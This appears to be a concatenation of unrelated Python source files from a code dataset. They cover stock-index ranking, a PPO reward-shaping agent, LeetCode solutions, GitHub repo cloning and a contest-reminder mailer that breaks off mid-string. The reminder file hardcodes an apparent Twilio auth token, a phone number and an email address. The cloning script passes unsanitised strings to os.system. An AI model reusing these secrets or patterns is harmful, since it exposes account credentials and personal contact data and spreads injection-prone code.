__init__(self,path = '../../../data/finance_processed',path_score = '../../../data/score', stocks = '000001', dates=['2018-06-30']):\n self.stock_codes = []\n self.path = path\n self.path_score = path_score\n if not os.path.exists(path_score):\n os.makedirs(path_score)\n self.path_overview_scores = os.path.join(path_score,'overview_scores_{}.csv'.format(dates[-1]))\n self.path_index = os.path.join(path_score,'index_{}.csv'.format(dates[-1]))\n self.path_index_score = os.path.join(path_score,'index_score_{}.csv'.format(dates[-1]))\n self.finance_index_data = self.load_all_finance_index(dates,stocks)\n \n def load_all_finance_index(self,dates,stocks):\n # stock_codes = ['000719']\n data_dict = {}\n for stock_code in stocks:\n print(\"stock:\",stock_code)\n data_finance = fic.load_process_financical_data(self.path, stock_code)\n if data_finance.empty:\n print('skip this stock', stock_code)\n continue\n if sum(data_finance.index.isin(dates))!=len(dates):\n print('skip this stock', stock_code)\n continue\n self.stock_codes.append(stock_code)\n data_dict[stock_code] = data_finance\n return data_dict\n \n def assess_one_finance_index(self, index, dates):\n index_series = pd.Series(dtype=float)\n score_series = pd.Series(dtype=float)\n len_dates = len(dates)\n for stock_code in self.stock_codes:\n index_series[stock_code] = 0.0\n for date in dates:\n print('date',date,'stock_code',stock_code)\n index_series[stock_code] = index_series[stock_code] + self.finance_index_data[stock_code].loc[date,index]\n index_series[stock_code] = index_series[stock_code] / float(len_dates);\n index_series_sorted = index_series.sort_values(axis=0,ascending=False) #sorted(index_series.items(), key = lambda d:d[1],reverse = True)\n stock_len = len(index_series_sorted)\n rank_index=0\n for stock in index_series_sorted.index:\n score_series[stock] = float(stock_len-rank_index)/float(stock_len) * 100.0\n rank_index = rank_index + 1\n score_series = score_series.sort_index(axis=0,ascending=True)#sorted(score_series.items(), key = lambda d:d[0],reverse = True)\n return [pd.DataFrame({index:index_series}), pd.DataFrame({index:score_series})]\n \n def fetch_selected_finance_indexs(self, indexs, dates,path_kmean):\n fecth_indexs = pd.Series(dtype=float)\n for date in dates:\n pd_indexs_path = os.path.join(path_kmean,'fecthing_finance_index_{}.csv'.format(date))\n if not os.path.exists(pd_indexs_path):\n pd_indexs = pd.DataFrame(dtype=float)\n print('fecthing date', date)\n for index in indexs:\n print('processing index is', index)\n [pd_index, pd_score] = self.assess_one_finance_index(index, [date])\n pd_indexs = pd.concat([pd_indexs, pd_index], axis=1)\n pd_indexs.to_csv(pd_indexs_path, encoding='gbk')\n else:\n pd_indexs = pd.read_csv(pd_indexs_path,index_col=0)\n fecth_indexs[date] = pd_indexs\n return fecth_indexs\n \n def assess_selected_finance_index(self,indexs,dates):\n pd_indexs = pd.DataFrame()\n pd_scores = pd.DataFrame()\n for index in indexs:\n print('processing index is', index)\n [pd_index, pd_score] = self.assess_one_finance_index(index, dates)\n pd_indexs = pd.concat([pd_indexs, pd_index], axis=1)\n pd_scores = pd.concat([pd_scores, pd_score], axis=1)\n \n pd_mean_scores = pd_scores.mean(axis=1)\n pd_mean_scores = pd_mean_scores.sort_values(axis=0,ascending=False)\n pd_mean_scores.to_csv(self.path_overview_scores, encoding='gbk')\n pd_scores.to_csv(self.path_index_score, encoding='gbk')\n pd_indexs.to_csv(self.path_index, encoding='gbk')\n \n \n \nif __name__ == '__main__':\n path = '../../../data/finance_processed'\n path_score = '../../../data/score'\n print(fic.finance_index_dic['roe'])\n stocks = stock_data_download.ts_stock_codes()\n #stocks = ['000001','000002','000004','000005','000006']\n dates = ['2018-06-30']#,'2017-12-31'\n fir = finance_index_rank(path=path, path_score=path_score, stocks = stocks, dates = dates)\n indexs = [\n #earning capacity\n FID['roe'],\\\n FID['roa'],\\\n FID['profit_revenue'],\\\n FID['profit_cost'],\\\n FID['equlity_incr_rate'],\\\n ###grow capacity\n FID['revenue_incr_rate'],\\\n FID['profit_incr_rate'],\\\n FID['cash_incr_rate'],\\\n FID['asset_incr_rate'],\\\n ]\n \"\"\" \n FID['debt_incr_rate'],\\\n ###asset struct\n FID['debt_asset_ratio'],\\\n FID['debt_equality_ratio'],\\\n FID['debt_net_asset_ratio'],\\\n FID['revenue_asset_ratio'],\\\n FID['goodwell_equality_ratio'],\\\n FID['dev_rev_ratio']\\\n \"\"\"\n \n \n \n fir.assess_selected_finance_index(indexs, dates)\n print('rank all the stock successfully');\n #data_dict = load_all_finance_processed_data(path)\n\n pass","repo_name":"luozero/finance_quant","sub_path":"bak/finance_index_rank.py","file_name":"finance_index_rank.py","file_ext":"py","file_size_in_byte":5074,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"53"} +{"seq_id":"6812603819","text":"import torch\nimport torch.nn as nn\nfrom torch.distributions import MultivariateNormal\nfrom torch.distributions import Categorical\nimport numpy as np\n\n################################## set device ##################################\nprint(\"============================================================================================\")\ndevice = torch.device('cpu')\n\nprint(\"Device set to : cpu\")\nprint(\"============================================================================================\")\ntorch.autograd.set_detect_anomaly(True)\n\n################################## PPO Policy ##################################\nclass RolloutBuffer:\n def __init__(self):\n self.actions = []\n self.states = []\n self.logprobs = []\n self.is_terminals = []\n self.rewards = []\n\n self.v_pred_true = []\n self.v_pred = []\n self.f_phi_s = []\n self.function = []\n \n def clear(self):\n del self.actions[:]\n del self.states[:]\n del self.logprobs[:]\n del self.is_terminals[:]\n del self.rewards[:]\n\n\n del self.v_pred_true[:]\n del self.v_pred[:]\n del self.f_phi_s[:]\n del self.function[:]\n\n\nclass Dataset(object):\n def __init__(self, data_map, deterministic=False, shuffle=True):\n self.data_map = data_map\n self.deterministic = deterministic\n self.enable_shuffle = shuffle\n self.n = next(iter(data_map.values())).shape[0]\n self._next_id = 0\n self.shuffle()\n\n def shuffle(self):\n if self.deterministic:\n return\n perm = np.arange(self.n)\n np.random.shuffle(perm)\n\n for key in self.data_map:\n self.data_map[key] = self.data_map[key][perm]\n\n self._next_id = 0\n\n def next_batch(self, batch_size):\n if self._next_id >= self.n and self.enable_shuffle:\n self.shuffle()\n\n cur_id = self._next_id\n cur_batch_size = min(batch_size, self.n - self._next_id)\n self._next_id = cur_id + cur_batch_size\n\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][cur_id:cur_id+cur_batch_size]\n return data_map\n\n def iterate_once(self, batch_size):\n if self.enable_shuffle: self.shuffle()\n\n while self._next_id <= self.n - batch_size:\n yield self.next_batch(batch_size)\n self._next_id = 0\n\n def subset(self, num_elements, deterministic=True):\n data_map = dict()\n for key in self.data_map:\n data_map[key] = self.data_map[key][:num_elements]\n return Dataset(data_map, deterministic)\n\nclass ActorCritic(nn.Module):\n def __init__(self, state_dim, action_dim, last_dim, has_continuous_action_space, action_std_init):\n super(ActorCritic, self).__init__()\n\n self.has_continuous_action_space = has_continuous_action_space\n self.first_optim = True\n if has_continuous_action_space:\n self.action_dim = action_dim\n self.action_var = torch.full((action_dim,), action_std_init * action_std_init).to(device)\n # actor\n \n if has_continuous_action_space :\n self.pol = nn.Sequential(\n nn.Linear(state_dim + last_dim, 8),\n nn.Tanh(),\n nn.Linear(8, 8),\n nn.Tanh(),\n nn.Linear(8, action_dim),\n nn.Tanh()\n )\n else:\n self.pol = nn.Sequential(\n nn.Linear(state_dim + last_dim, 8),\n nn.Tanh(),\n nn.Linear(8, 8),\n nn.Tanh(),\n nn.Linear(8, action_dim),\n nn.Softmax(dim=-1)\n )\n self.vf_true = nn.Sequential(\n nn.Linear(state_dim, 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1)\n )\n \n self.vf_shaped = nn.Sequential(\n nn.Linear(state_dim+ last_dim, 32),\n nn.Tanh(),\n nn.Linear(32, 32),\n nn.Tanh(),\n nn.Linear(32, 1)\n )\n\n \n self.f_phi = nn.Sequential(\n nn.Linear(state_dim, 16),\n nn.Tanh(),\n nn.Linear(16,8),\n nn.Tanh(),\n nn.Linear(8, last_dim),\n nn.Tanh()\n ) \n \n def set_action_std(self, new_action_std):\n if self.has_continuous_action_space:\n self.action_var = torch.full((self.action_dim,), new_action_std * new_action_std).to(device)\n else:\n print(\"--------------------------------------------------------------------------------------------\")\n print(\"WARNING : Calling ActorCritic::set_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def forward(self):\n raise NotImplementedError\n \n def act(self, state):\n\n vpred_true = self.vf_true(state)\n f_phi_s = self.f_phi(state)\n last_out = torch.concat([state, f_phi_s], axis=0)\n\n if self.has_continuous_action_space:\n action_mean = self.pol(last_out)\n cov_mat = torch.diag(self.action_var).unsqueeze(dim=0)\n dist = MultivariateNormal(action_mean, cov_mat)\n else:\n action_probs = self.pol(last_out)\n dist = Categorical(action_probs)\n\n action = dist.sample()\n action_logprob = dist.log_prob(action)\n vpred = self.vf_shaped(last_out)\n\n return action.detach(), action_logprob.detach(), vpred.detach(), vpred_true.detach(), f_phi_s.detach()\n \n def evaluate(self, state, action):\n\n vpred_true = self.vf_true(state)\n f_phi_s = self.f_phi(state)\n last_out = torch.concat([state, f_phi_s], axis=1)\n \n if self.has_continuous_action_space:\n action_mean = self.pol(last_out)\n \n action_var = self.action_var.expand_as(action_mean)\n cov_mat = torch.diag_embed(action_var).to(device)\n dist = MultivariateNormal(action_mean, cov_mat)\n \n # For Single Action Environments.\n if self.action_dim == 1:\n action = action.reshape(-1, self.action_dim)\n else:\n action_probs = self.pol(last_out)\n dist = Categorical(action_probs)\n action_logprobs = dist.log_prob(action)\n\n dist_entropy = dist.entropy()\n\n vpred = self.vf_shaped(last_out) \n\n return action_logprobs.cpu().flatten(), dist_entropy.cpu().flatten(), vpred.cpu().flatten(), vpred_true.cpu().flatten(), f_phi_s.cpu().flatten()\n\n\nclass PPO:\n def __init__(self, state_dim, action_dim,last_dim, lr_actor, lr_critic, lr_f, gamma, lam, K_epochs, batch_size, eps_clip, entropy_coeff, has_continuous_action_space, action_std_init=0.6):\n\n self.has_continuous_action_space = has_continuous_action_space\n self.optimize_policy = True\n\n if has_continuous_action_space:\n self.action_std = action_std_init\n\n self.entropy_coeff = entropy_coeff\n self.gamma = gamma\n self.lam = lam\n self.eps_clip = eps_clip\n self.K_epochs = K_epochs\n self.first_optim = True\n self.optim_batch_size = batch_size\n self.buffer = RolloutBuffer()\n\n self.pi = ActorCritic(state_dim, action_dim, last_dim, has_continuous_action_space, action_std_init).to(device)\n \n self.policy_opt = torch.optim.Adam([\n {'params': self.pi.pol.parameters(), 'lr': lr_actor,\"eps\":1e-5 },\n ])\n self.critic_opt = torch.optim.Adam([\n {'params': self.pi.vf_shaped.parameters(), 'lr': lr_critic, \"eps\":1e-5},\n ])\n\n self.true_critic_opt = torch.optim.Adam([\n {'params': self.pi.vf_true.parameters(), 'lr': lr_critic, \"eps\":1e-5},\n ])\n\n self.f_opt = torch.optim.Adam([\n {'params': self.pi.f_phi.parameters(), 'lr': lr_f, \"eps\":1e-5},\n ])\n self.pi_old = ActorCritic(state_dim, action_dim,last_dim, has_continuous_action_space, action_std_init).to(device)\n self.pi_old.load_state_dict(self.pi.state_dict())\n self.MseLoss = nn.MSELoss()\n\n def set_action_std(self, new_action_std):\n if self.has_continuous_action_space:\n self.action_std = new_action_std\n self.pi.set_action_std(new_action_std)\n self.pi_old.set_action_std(new_action_std)\n else:\n print(\"--------------------------------------------------------------------------------------------\")\n print(\"WARNING : Calling PPO::set_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def decay_action_std(self, action_std_decay_rate, min_action_std):\n print(\"--------------------------------------------------------------------------------------------\")\n if self.has_continuous_action_space:\n self.action_std = self.action_std - action_std_decay_rate\n self.action_std = round(self.action_std, 4)\n if (self.action_std <= min_action_std):\n self.action_std = min_action_std\n print(\"setting actor output action_std to min_action_std : \", self.action_std)\n else:\n print(\"setting actor output action_std to : \", self.action_std)\n self.set_action_std(self.action_std)\n\n else:\n print(\"WARNING : Calling PPO::decay_action_std() on discrete action space policy\")\n print(\"--------------------------------------------------------------------------------------------\")\n\n def choose_action(self, state):\n\n if self.has_continuous_action_space:\n with torch.no_grad():\n state = torch.FloatTensor(state).to(device)\n action, action_logprob, vpred ,vpred_true , f_phi_s = self.pi_old.act(state)\n self.buffer.states.append(state)\n self.buffer.actions.append(action)\n self.buffer.logprobs.append(action_logprob)\n self.buffer.v_pred.append(vpred)\n self.buffer.v_pred_true.append(vpred_true)\n self.buffer.f_phi_s.append(f_phi_s)\n\n return action.detach().cpu().numpy().flatten(), vpred.detach().cpu().numpy().flatten(), vpred_true.detach().cpu().numpy().flatten() , f_phi_s.detach().cpu().numpy().flatten() \n else:\n with torch.no_grad():\n state = torch.FloatTensor(state).to(device)\n action, action_logprob, vpred ,vpred_true ,f_phi_s = self.pi_old.act(state)\n self.buffer.states.append(state)\n self.buffer.actions.append(action)\n self.buffer.logprobs.append(action_logprob)\n self.buffer.v_pred.append(vpred)\n self.buffer.v_pred_true.append(vpred_true)\n self.buffer.f_phi_s.append(f_phi_s)\n\n return action.cpu().numpy().flatten(), vpred.cpu().numpy().flatten(), vpred_true.cpu().numpy().flatten(), f_phi_s.detach().cpu().numpy().flatten() \n\n def ppo_update(self, **kwargs):\n self.ppo_update_policy( **kwargs)\n self.ppo_update_shaping_weight_func( **kwargs)\n\n def ppo_update_policy(self, **kwargs):\n truncation_size = len(self.buffer.states)-1\n\n seg = {\"ob\": torch.tensor([self.buffer.states[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"ac\": torch.tensor([self.buffer.actions[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"old_logprobs\": torch.tensor([self.buffer.logprobs[0].cpu().clone() for _ in range(truncation_size)]),\n \"rew\": torch.zeros(truncation_size, dtype=float),\n \"v_pred\": torch.zeros(truncation_size, dtype=float),\n \"done\": torch.zeros(truncation_size, dtype=int),\n \"F\": torch.zeros(truncation_size, dtype=float),\n \"f_phi_s\": torch.zeros(truncation_size, dtype=float)\n }\n \n for t in range(truncation_size):\n seg[\"ob\"][t] = self.buffer.states[t].cpu().clone()\n seg[\"ac\"][t] = self.buffer.actions[t].cpu().clone()\n seg[\"old_logprobs\"][t] = self.buffer.logprobs[t].cpu().clone()\n seg[\"rew\"][t] = self.buffer.rewards[t]\n seg[\"done\"][t] = self.buffer.is_terminals[t]\n seg[\"v_pred\"][t] = self.buffer.v_pred[t]\n seg[\"f_phi_s\"][t] = self.buffer.f_phi_s[t].cpu().clone()\n seg[\"F\"][t] = self.buffer.function[t]\n \n vpred = torch.tensor(np.append(seg[\"v_pred\"], kwargs.get(\"next_v_pred\")))\n seg_done = seg[\"done\"]\n seg_rewards = seg[\"rew\"]\n seg_F = seg[\"F\"]\n seg_f = seg[\"f_phi_s\"]\n\n gae_lam = torch.empty(truncation_size, dtype = float)\n last_gae_lam = 0\n for t in reversed(range(truncation_size)):\n non_terminal = 1 - seg_done[t]\n delta = seg_rewards[t] + seg_f[t] * seg_F[t] + self.gamma * vpred[t + 1] * non_terminal - vpred[t]\n gae_lam[t] = delta + self.gamma * self.lam * non_terminal * last_gae_lam\n last_gae_lam = gae_lam[t]\n \n seg[\"adv\"] = gae_lam\n seg[\"td_lam_ret\"] = seg[\"adv\"] + seg[\"v_pred\"]\n self.learn(ob=seg[\"ob\"], ac=seg[\"ac\"], adv=seg[\"adv\"],\n td_lam_ret=seg[\"td_lam_ret\"],\n f_phi_s=seg[\"f_phi_s\"], old_logprobs= seg[\"old_logprobs\"])\n self.switch_optimization()\n\n def ppo_update_shaping_weight_func(self, **kwargs):\n\n truncation_size = len(self.buffer.states)-1\n\n seg = {\"ob\": torch.tensor([self.buffer.states[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"ac\": torch.tensor([self.buffer.actions[0].cpu().clone().tolist() for _ in range(truncation_size)]),\n \"old_logprobs\": torch.tensor([self.buffer.logprobs[0].cpu().clone() for _ in range(truncation_size)]),\n \"rew\": torch.zeros(truncation_size, dtype=float),\n \"v_pred_true\": torch.zeros(truncation_size, dtype=float),\n \"done\": torch.zeros(truncation_size, dtype=int),\n \"F\": torch.zeros(truncation_size, dtype=float),\n \"f_phi_s\": torch.zeros(truncation_size, dtype=float)\n }\n\n for t in range(truncation_size):\n seg[\"ob\"][t] = self.buffer.states[t].cpu().clone()\n seg[\"ac\"][t] = self.buffer.actions[t].cpu().clone() \n seg[\"old_logprobs\"][t] = self.buffer.logprobs[t].cpu().clone()\n seg[\"rew\"][t] = self.buffer.rewards[t] \n seg[\"done\"][t] = self.buffer.is_terminals[t]\n seg[\"v_pred_true\"][t] = self.buffer.v_pred_true[t].cpu().clone()\n seg[\"f_phi_s\"][t] = self.buffer.f_phi_s[t].cpu().clone()\n\n seg_done = seg[\"done\"]\n seg_v_pred_true = torch.tensor(np.append(seg[\"v_pred_true\"], kwargs.get(\"next_v_pred_true\")))\n\n gae_lam = torch.empty(truncation_size, dtype = float)\n seg_rewards = seg[\"rew\"]\n last_gae_lam = 0\n\n for t in reversed(range(truncation_size)):\n non_terminal = 1 - seg_done[t] \n delta = seg_rewards[t] + self.gamma * seg_v_pred_true[t + 1] * non_terminal - seg_v_pred_true[t]\n gae_lam[t] = delta + self.gamma * self.lam * non_terminal * last_gae_lam\n last_gae_lam = gae_lam[t]\n\n seg[\"adv_true\"] = gae_lam\n seg[\"ret_true\"] = seg[\"adv_true\"] + seg[\"v_pred_true\"]\n\n self.learn(ob=seg[\"ob\"], ac=seg[\"ac\"], adv_true=seg[\"adv_true\"],\n ret_true=seg[\"ret_true\"],\n f_phi_s=seg[\"f_phi_s\"], old_logprobs= seg[\"old_logprobs\"])\n \n self.switch_optimization()\n \n \n def learn(self, **kwargs):\n if self.optimize_policy:\n self.update_policy(**kwargs)\n\n else:\n self.update_shaping_weight_func(**kwargs)\n \n def update_policy(self, **kwargs):\n bs = kwargs.get(\"ob\")\n ba = kwargs.get(\"ac\")\n batch_adv = kwargs.get(\"adv\")\n batch_td_lam_ret = kwargs.get(\"td_lam_ret\")\n batch_f_phi_s = kwargs.get(\"f_phi_s\")\n batch_adv = (batch_adv - batch_adv.mean()) / batch_adv.std()\n\n old_logprobs = kwargs.get(\"old_logprobs\")\n\n d = Dataset(dict(bs=bs, \n ba=ba, \n badv=batch_adv,\n bret=batch_td_lam_ret,\n bf=batch_f_phi_s, \n old_logprobs = old_logprobs),\n\n deterministic=False)\n self.pi_old.load_state_dict(self.pi.state_dict())\n \n batch_size = self.optim_batch_size or bs.shape[0]\n for _ in range(self.K_epochs):\n for batch in d.iterate_once(batch_size):\n atarg = batch[\"badv\"]\n action_logprobs, dist_entropy, vpred, _, _ = self.pi.evaluate(batch[\"bs\"], batch[\"ba\"])\n mean_ent = torch.mean(dist_entropy)\n\n ratio = torch.exp(action_logprobs - batch[\"old_logprobs\"])\n # Finding Surrogate Loss \n surr1 = torch.where(\n torch.logical_or(torch.isinf(ratio * atarg ), torch.isnan(ratio * atarg)),\n torch.zeros_like(ratio),\n ratio * atarg\n )\n \n surr2 = torch.clamp(ratio, 1-self.eps_clip, 1+self.eps_clip) * atarg\n # final loss of clipped objective PPO\n vf_loss = torch.mean(torch.square(vpred - batch[\"bret\"])) \n pol_surr = torch.mean(torch.minimum(surr1, surr2))\n pol_ent_pen = -1 * self.entropy_coeff * mean_ent\n total_loss = pol_surr + pol_ent_pen + vf_loss\n\n # take gradient step\n self.critic_opt.zero_grad()\n self.policy_opt.zero_grad()\n\n vf_loss.backward(retain_graph=True)\n total_loss.backward()\n\n # vf_loss.backward()\n # torch.nn.utils.clip_grad_norm_(self.pi.vf_shaped.parameters(), 1.0)\n # torch.nn.utils.clip_grad_norm_(self.pi.pol.parameters(), 1.0)\n\n self.critic_opt.step()\n self.policy_opt.step()\n \n\n def update_shaping_weight_func(self, **kwargs):\n\n bs = kwargs.get(\"ob\")\n ba = kwargs.get(\"ac\")\n batch_adv = kwargs.get(\"adv_true\")\n batch_ret = kwargs.get(\"ret_true\")\n batch_f_phi_s = kwargs.get(\"f_phi_s\")\n batch_adv = (batch_adv - batch_adv.mean()) / batch_adv.std()\n old_logprobs = kwargs.get(\"old_logprobs\")\n\n d = Dataset(dict(bs=bs,\n ba=ba, \n badv=batch_adv, \n bret=batch_ret,\n bf=batch_f_phi_s,\n old_logprobs = old_logprobs),\n deterministic=False)\n \n batch_size = self.optim_batch_size or bs.shape[0]\n self.pi_old.load_state_dict(self.pi.state_dict())\n\n for _ in range(self.K_epochs):\n for batch in d.iterate_once(batch_size):\n action_logprobs, _, _, vpred_true, _ = self.pi.evaluate(batch[\"bs\"], batch[\"ba\"])\n\n atarg_true = batch[\"badv\"]\n ratio_clip_param_f = 0.2\n ratio = torch.exp(action_logprobs - batch[\"old_logprobs\"])\n\n vf_true_loss = torch.mean(torch.square(vpred_true - batch[\"bret\"])) \n surr1_f = torch.where(torch.logical_or(\n torch.isinf(ratio * atarg_true),\n torch.isnan(ratio * atarg_true)),\n torch.zeros_like(ratio),\n ratio * atarg_true)\n surr2_f = torch.clamp(ratio, 1-ratio_clip_param_f, 1+ratio_clip_param_f) * atarg_true\n f_loss = - torch.mean(torch.minimum(surr1_f, surr2_f))\n\n self.true_critic_opt.zero_grad()\n self.f_opt.zero_grad()\n\n vf_true_loss.backward()\n f_loss.backward()\n\n # torch.nn.utils.clip_grad_norm_(self.pi.vf_true.parameters(), 1.0)\n # torch.nn.utils.clip_grad_norm_(self.pi.f_phi.parameters(), 10.0)\n\n self.true_critic_opt.step()\n self.f_opt.step()\n\n self.buffer.clear()\n \n\n def switch_optimization(self):\n self.optimize_policy = not self.optimize_policy\n\n def save(self, checkpoint_path):\n torch.save(self.pi_old.state_dict(), checkpoint_path)\n \n def load(self, checkpoint_path):\n self.pi_old.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))\n self.pi.load_state_dict(torch.load(checkpoint_path, map_location=lambda storage, loc: storage))\n \n \n \n\n\n","repo_name":"CAI23sbP/bi-level-optimization-of-parameterized-reward-shaping","sub_path":"PPO.py","file_name":"PPO.py","file_ext":"py","file_size_in_byte":21424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17805606345","text":"import sys \nfrom pathlib import Path\nimport os \nimport re\n\ndossier_racine = Path(sys.argv[1])\n\nimport os\n\n\nimport os\n\n# Chemin du dossier racine à explorer\n\n# Liste pour enregistrer les liens des fichiers\nliens_fichiers = []\n\n# Parcours de l'arborescence de dossiers de manière récursive\nfor dossier, sous_dossiers, fichiers in os.walk(dossier_racine):\n for fichier in fichiers:\n # Création du chemin absolu vers le fichier\n chemin_fichier = os.path.join(dossier, fichier)\n # Ajout du chemin du fichier à la liste\n liens_fichiers.append(chemin_fichier)\n\n# expression régulière pour récupérer toutes les pages d'instructions d'annotations de la partie générale du guide !\nlinks_re = re.compile(r\".*/content/(docs/general_guideline/.*)\")\ntag = re.compile(r\".*/content/docs/general_guideline/(.*/)+(\\w+).md\")\n\ndict_link = {}\n# # Affichage des liens des fichiers enregistrés dans la liste\nfor element in liens_fichiers:\n\t\t# on match l'expression régulière d'un dossier avec les noms de dossiers\n\t\tm = re.match(links_re,element)\n\t\tif m:\n\t\t\t# si on est dans un dossier, on cherche le tag (.md) pour récupérer le tag associé au bon chemin\n\t\t\tn = re.match(tag,element)\n\t\t\tif n:\n\t\t\t\t# on ajoute les information dans le dictionnaire dict_link[chemin relatif]=tag\n\t\t\t\tdict_link[m.group(1)]=n.group(2)\n\n\n#print(dict_link)\n\n# on écrit les résultats dans un fichier .csv\nwith open(\"links.csv\",\"w\",encoding=\"utf-8\") as output:\n\toutput.write(\"tag;link\")\n\tfor key,value in dict_link.items():\n\t\toutput.write(f\"{str(value)};{str(key)}\\n\") \n","repo_name":"Julie921/guideline_prototype_hugo","sub_path":"tools/create_links/get_link.py","file_name":"get_link.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3891686259","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# k67.py\nfrom chap7.utils import mongo_connect\n\nif __name__ == '__main__':\n collection = mongo_connect()\n\n oasis = list(collection.find({'aliases.name': 'オアシス'}))\n for data in oasis:\n print(oasis)\n","repo_name":"Cain96/nlp100","sub_path":"chap7/k67.py","file_name":"k67.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20522802182","text":"#!/usr/bin/env ipython\n\nfrom typing import Tuple, Union, Optional, Dict, Any\n\n\nKINDLE_SEPARATOR: str = \"==========\"\nEMACS_TIME = \"[%Y-%m-%d %a %H:%M]\"\nEMACS_DATE = \"<%Y-%m-%d %a>\"\nKINDLE_TIME = \"Added on %A, %B %d, %Y %I:%M:%S %p\"\n\n\n# Type definitions\nPageRange = Tuple[Union[str, int], Optional[Union[str, int]]]\nLocationRange = Tuple[int, Optional[int]]\nHash = int\nHeading = str\nBookTitle = str\nAuthorName = str\nSeries = str\nIsNoteCollated = bool\nProperties = Dict[str, Any]\n","repo_name":"lyterk/KindleToOrg","sub_path":"static.py","file_name":"static.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35452334415","text":"\n# https://leetcode-cn.com/problems/daily-temperatures/\nfrom typing import List\n\nclass Solution:\n # 超时\n def dailyTemperaturesI(self, T: List[int]) -> List[int]:\n copyT = T\n\n arr = []\n for j in range(0, len(T)):\n tmp = []\n for i in range(j+1, len(copyT)):\n tmp.append(T[i] - T[j])\n if(T[i] - T[j])>0:\n break\n arr.append(tmp)\n\n ans = []\n\n for elem in arr:\n ans.append(0)\n for j in range(0, len(elem)):\n if elem[j] > 0:\n ans.pop()\n ans.append(j+1)\n break\n\n\n return ans\n\n def dailyTemperaturesII(self, T: List[int]) -> List[int]:\n n = len(T)\n\n ans, nxt, big = [0] * n, dict(), 10 ** 9\n\n for i in range(n - 1, -1, -1):\n warmer_index = min(nxt.get(t, big) for t in range(T[i] + 1, 102))\n if warmer_index != big:\n ans[i] = warmer_index - i\n nxt[T[i]] = i\n\n return ans\n\n def dailyTemperaturesIII(self, T: List[int]) -> List[int]:\n length = len(T)\n ans = [0] * length\n stack = []\n for i in range(length):\n temperature = T[i]\n while stack and temperature > T[stack[-1]]:\n prev_index = stack.pop()\n ans[prev_index] = i - prev_index\n stack.append(i)\n return ans\n\n\n\n\n\n\ns = Solution()\ns.dailyTemperatures([73, 74, 75, 71, 69, 72, 76, 73])\n","repo_name":"azhu51/leetcode-practice","sub_path":"daily/medium_739_daily_temperatures.py","file_name":"medium_739_daily_temperatures.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29279179852","text":"from dotenv import load_dotenv\nimport os\nfrom github import Github\n\nload_dotenv()\n\ng = Github(os.getenv(\"GITHUB_ACCESS_TOKEN\"))\nfolder_path = os.getenv(\"GITHUBREPOFOLDER\")\n\ndef get_list_of_downloaded_repos():\n return os.listdir(folder_path)\n\ndef get_list_of_github_repos():\n list_of_repos = []\n for repo in g.get_user().get_repos():\n list_of_repos.append(repo.name)\n return list_of_repos\n\ndef repos_that_need_to_be_cloned():\n repos_to_be_cloned = []\n for repo in get_list_of_github_repos():\n if repo not in get_list_of_downloaded_repos():\n repos_to_be_cloned.append(repo)\n return repos_to_be_cloned\n\ndef get_repos_urls():\n list_of_repos = []\n for repo in g.get_user().get_repos():\n if repo.name in repos_that_need_to_be_cloned():\n list_of_repos.append(repo.clone_url)\n return list_of_repos\n\ndef clone_needed_repos():\n for url in get_repos_urls():\n command_to_execute = 'cd ' + str(folder_path) + ' && git clone '+ str(url)\n print(\"\\n\\n\")\n print(command_to_execute)\n os.system(command_to_execute)\n\n\ndef test_functions():\n print(get_list_of_downloaded_repos())\n print(\"\\n\")\n print(get_list_of_github_repos())\n print(\"\\n\")\n print(repos_that_need_to_be_cloned())\n print(\"\\n\")\n print(get_repos_urls()) \n\nif __name__ == \"__main__\":\n #test_functions()\n clone_needed_repos()","repo_name":"Joe-Grey/Clone_All_Repos","sub_path":"clone_all_github_repos.py","file_name":"clone_all_github_repos.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23069481672","text":"import requests\nimport os\nimport random\nfrom twilio.rest import Client\nfrom smtplib import SMTPAuthenticationError\nfrom django.core.mail import send_mail\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\n\ndef send_wa_msg(s):\n account_sid = \"ACf692485845f83d3f27da8265b4bc6ad2\"\n auth_token = \"68392ba606eb7a4a67a39e407f8fb9d1\"\n client = Client(account_sid, auth_token)\n\n message = client.messages.create(from_=\"+13614507855\", body=s, to=\"+916353995184\")\n\n print(message.sid)\n\n\ndef generate_otp():\n return random.randint(100000, 999999)\n\n\ndef send_otp_email(email, otp):\n subject = \"OTP Verification\"\n message = f\"Your OTP is: {otp}\"\n from_email = \"samarthshinde247@gmail.com\"\n recipient_list = [email]\n try:\n send_mail(subject, message, from_email, recipient_list)\n except SMTPAuthenticationError:\n # Handle the authentication error here\n return Response(\n \"Failed to send email. SMTP authentication error.\",\n status=status.HTTP_500_INTERNAL_SERVER_ERROR,\n )\n\n\ndef send_reminder_email(contest, sender_email, recipient_email, eta=None):\n subject = f'CoCode Reminder: {contest[\"name\"]}'\n message = f\"\"\"\n

Reminder:

\n

The contest {contest[\"name\"]} will start in 30 minutes.

\n

Time: {contest['start_time']} - {contest['end_time']}

\n

Link: {contest['url']}

